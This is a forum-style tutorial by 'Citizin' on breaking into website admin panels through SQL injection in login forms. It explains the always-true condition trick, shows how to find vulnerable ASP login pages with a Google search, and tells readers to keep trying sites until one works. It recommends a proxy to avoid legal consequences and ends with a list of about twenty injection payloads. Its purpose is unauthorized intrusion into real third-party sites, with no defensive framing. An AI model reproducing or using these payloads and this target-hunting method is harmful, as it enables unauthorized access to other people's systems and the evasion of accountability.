Easy way to gain administrative access on a website
By Citizin
This is a simple tutorial, will tell you just what to do, and how it works, lets get to reading, eh?
Step 1 – What to do exactly
Lets understand what were going to do.
You need a line of text/code that is true, and what do I mean by true?
Thats true, 1 = 1 is true.
How do we use that to our advantage?
Well lets see here.
What does a username and password always check for?
Username:Justin
Password:PinkPanther
When you login, it checks if Justin’s Password equals Pinkpanther, well
something is already true in the line 1 = 1, so thats all we really
need. Theres lots of other injections you can make, so be creative,
this one might not work on some websites as others do, for a list of
other injections read the bottom of the tutorial.
Now to continue.
The formatting is similar to this:
Quote:
|
“SELECT * FROM tblUser WHERE UserName = ‘user’ AND Password = ‘pass’;”
|
So when you type ‘ or ’1′ = ’1 it looks like:
Quote:
|
“SELECT * FROM tblUser WHERE UserName = ” or ’1′ = ’1′ AND Password = ” or ’1′ = ’1′;”
|
Step 2 – So I understand how it works, how to get logins?
Well, google is one of the top search engines, but works as more
than a search engine, lets take a closer look at how we can find ASP
Logins with google.
1. Go to Google.com
2. Type “login filetype:asp”
3. Click on a link and type in the injection for username and password
4. If Successfull you’ll have admin cp
5. If not return to #2 and try a diffrent link
See, now the problem is a lot of these are going to get hit, so I
suggest you start on page 15, a lot may not work, a lot may, so don’t
give up cause the first 10 didn’t work, I also suggest using a proxy, I
got a email from some website saying that they were going to sue, some
bullshit, but I was under a proxy and I tagged the site with my email,
so thats the only think they have of mine, some webmasters my take this
seriously, so be carefull.
Other Injections
Here they be:
Code:
admin'--
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a
Other Sql Injections thanks to ComSec Of GovermentSecurity.
I hope this all helped you, I suggest reading up on injection to understand it a bit more.
-Citizin
www.gamerzplanet.net
Recent Comments